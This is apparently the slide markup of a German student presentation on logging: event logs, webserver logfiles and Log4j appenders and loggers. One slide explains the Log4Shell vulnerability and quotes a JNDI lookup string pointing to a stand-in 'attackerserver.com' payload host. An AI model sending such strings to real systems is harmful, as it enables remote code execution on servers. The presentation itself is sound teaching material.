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681ce6676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681ce6676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681ce667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681ce667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681ce6676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681ce6676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681ce6676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681ce6676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681ce6676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681ce667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681ce6676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681ce667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681ce667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681ce667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b955eef84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b955eef84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681ce6676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681ce6676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681ce6676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681ce667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be7977df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be7977df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681ce6676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681ce6676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681ce6676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681ce6676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681ce6676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681ce6676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681ce66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681ce66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681ce6676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681ce6676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681ce667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681ce667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681ce667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681ce667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681ce6676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681ce6676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681ce6676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681ce6676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681ce667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681ce667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58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>
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ogging</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1"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58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>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ogging mittels </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vent </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>og</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill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4670100" y="1171050"/>
            <a:ext cx="435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4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="35178" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="362000" y="923600"/>
            <a:ext cx="8209349" cy="39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7475" y="71612"/>
            <a:ext cx="1811892" cy="7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58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>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ogging mittels </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ogfile</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Google Shape;140;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1169525"/>
            <a:ext cx="8520600" cy="4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enthält ebenfalls Protokoll von Events / Fehlern (auch von Firewall, Viren-Scanner, Mail- / Proxy-Server etc.)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wird alles geloggt, was später für Audit (Überprüfung) notwendig werden könnte → entsprechend Log Level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Spezifikation Datenbanken: Transaktionsprotokoll hält ausgeführte Änderungen an Datenbank fest, zur Erleichterung Einspielen ggf. benötigtes Backup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da chronologische Abfolge der Einträge: Aufbau = Zeitstempel (Datum &amp; Uhrzeit) + ausgeführte Aktion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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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58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>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="0"/>
            <a:ext cx="8520600" cy="6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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server-Logfile – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Webserver</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill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564850" y="847325"/>
            <a:ext cx="81720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FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>189.74.144.59</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[22/Apr/2013:10:14:12 +0200]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="93C47D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"GET /images/logo.jpg HTTP/1.1"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1024 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="B45F06"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"http://www.wikipedia.org/"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="674EA7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"Mozilla/5.0 (X11; U; Linux i686; de-DE;rv:1.7.5)"</a:t>
            </a:r>
            <a:endParaRPr sz="1800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</a:rPr>
              <a:t>Abschnitte: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</a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - IP-Adresse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</a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Zeitstempel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</a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="93C47D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Aktion (Bildabfrage)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</a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 200 = Abfrage erfolgreich (HTTP-Statuscode)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</a:rPr>
              <a:t>	5 - Größe Abfrage in Bytes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</a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="B45F06"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Ziel-URL der Abfrage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</a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="674EA7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Browserversion &amp; Betriebssystem des Abfragenden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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ hierbei Nutzen ersichtlich: viele ggf. benötigte Infos über user vorliegend!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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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58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>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server-Log (CMD)</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill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4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="48424" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="407150" y="923600"/>
            <a:ext cx="8268148" cy="386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5549" y="0"/>
            <a:ext cx="2060299" cy="8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58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>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log4j</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1169525"/>
            <a:ext cx="8520600" cy="4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Framework zum Loggen von Anwendungsmeldungen (Events / Errors etc.)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auf Schnelligkeit ausgelegt, um andere Prozesse nicht negativ zu beeinflussen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Log Level wird vom Programmierer initial festgelegt (Entscheidung über Wichtigkeit Meldung) → auch während runtime änderbar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leitet Meldungen über Logger (Object) an Appender weiter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</a:rPr>
              <a:t>→ entsprechend Log Level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</a:rPr>
              <a:t>→ Einstufung des Log Levels innerhalb von Nanosekunden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Umfang der Log-Einträge wird je nach Wichtigkeit (Log Level) erhöht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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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58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>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log4j</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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311700" y="1169525"/>
            <a:ext cx="8520600" cy="4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Konfiguration mittels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Properties-Datei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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML-Datei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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>im Programmcode → nicht empfohlen, da Logging während runtime nicht umkonfigurierbar &amp; abhängig vom Code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Konfigurations-Dateien (Properties- / XML-) definieren Verhalten von Log4j mittels jeweils Appender und Logger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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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58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>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log4j – Appender</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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311700" y="1169525"/>
            <a:ext cx="8726100" cy="4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primäre Funktion: Definition, wohin und wie wird geloggt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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wohin:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> mittels Klasse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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wie: mittels Layout-Konfiguration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wichtigste Typen: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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FileAppender (in Logfile schreiben)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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JDBCAppender (in Datenbank speichern)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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ConsoleAppender (in Konsole ausgeben)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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NTEventLogAppender (ins Windows-seitige Ereignisprotokoll loggen)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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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58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>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log4j – Appender</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Google Shape;188;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1296825"/>
            <a:ext cx="8520600" cy="3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weitere </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Typen: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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SyslogAppender (Meldung mittels Syslog-Dienst im IP-Netz übermitteln)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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMTPAppender (Mail-Benachrichtigung bei spezifischer Meldung)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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LogCatAppender (in Android LogCat loggen)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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DailyRollingFileAppender (zu definierten Zeiten neues file beginnen)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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RollingFileAppender (ab definierter Größe neues file beginnen)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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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58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>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log4j – Logger</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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433600" y="1002450"/>
            <a:ext cx="8398800" cy="3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= Objekt, welches die Logging-Aufgaben einer Klasse übernimmt</a:t>
            </a:r>
            <a:endParaRPr sz="18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static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de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de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de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3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de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de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LogManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de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getLogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de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de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3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de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getName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de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Wird über seinen Namen identifiziert, dazu meist Verwendung des Klassennamens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Die Konfiguration des Loggers kann auch auf das gesamte Paket angewandt werden, also alle anderen Klassen des Programmes (Bsp.: mit unterschiedlichen Log Level)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Zu jedem Logger können mehrere Appender definiert werden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Ausgabe auf der Konsole &amp; Speichern in Logfile gleichzeitig möglich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58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>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lücke in</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log4j</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Log4Shell</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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311700" y="1169525"/>
            <a:ext cx="8701800" cy="4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In einer Webanwendung werden Daten erfasst (Bsp.: Name)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Dieser Name wird durch einen Server (Java) verarbeitet und mit Log4j geloggt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Statt des Namens übergibt der Angreifer einen bösartigen String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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zu vergleichen mit bspw. SQL-Injection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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>${jndi:Idao://attackerserver.com:1389/ExploitPayload}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Server Angreifer stellt durch diesen Log eine Verbindung zu dem angegriffenen Server her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Code vom Angreifer-Server wird an Ziel-Server übertragen und dort ausgeführt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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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58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71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gliederung</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125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38425" y="1284900"/>
            <a:ext cx="3714000" cy="3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33512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de" sz="3050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Was ist Logging?</a:t>
            </a:r>
            <a:endParaRPr sz="3050">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-33512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de" sz="3050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anwendung und Funktionsweise</a:t>
            </a:r>
            <a:endParaRPr sz="3050">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-33512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de" sz="3050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log Levels</a:t>
            </a:r>
            <a:endParaRPr sz="3050">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-33512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de" sz="3050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Logging mittels Event Log</a:t>
            </a:r>
            <a:endParaRPr sz="3050">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-33512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de" sz="3050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Logging mittels Logfile</a:t>
            </a:r>
            <a:endParaRPr sz="3050">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-33512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de" sz="3050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server-Logfile – Webserver</a:t>
            </a:r>
            <a:endParaRPr sz="3050">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-33512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de" sz="3050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server-Log in CMD</a:t>
            </a:r>
            <a:endParaRPr sz="3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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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109025" y="1284900"/>
            <a:ext cx="33918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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log4j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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log4j – Appender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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log4j – Logger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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lücke in Log4j – Log4Shell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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>praktisches Beispiel Logger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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quellen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58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 txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lücke in Log4j – Log4Shell</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Google Shape;212;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1479800"/>
            <a:ext cx="8718000" cy="4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Beispiel für ausführbaren Code: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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server bekommt die Anweisung, Bitcoins zu farmen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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wenn erfolgreich gefarmt wurde, werden Bitcoins an Angreifer übertragen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Angreifer bekommt vollständige Kontrolle über den Server, die dort gespeicherten Daten und teilweise über das Netzwerk des Servers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betroffene Versionen: 2 - 2.14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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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58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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2421900" y="1919025"/>
            <a:ext cx="4300200" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>praktisches Beispiel Logger</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill>
            </a:endParaRPr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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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58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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quellen</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Google Shape;227;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1169525"/>
            <a:ext cx="8520600" cy="4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" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://logging.apache.org/log4j/2.x/manual/api.html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" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.torsten-horn.de/techdocs/java-log4j.htm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" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://de.wikipedia.org/wiki/Log4j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" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://docs.microsoft.com/de-de/windows/win32/eventlog/event-logging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" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS0Vbd4F1m-LMbW51cRZSAMCpqx4ahjdoFmVrey16iyhwPnuDePw7i-b1ImVnQ4ENLO9LI&amp;usqp=CAU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" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://de.wikipedia.org/wiki/Ereignisprotokoll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" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
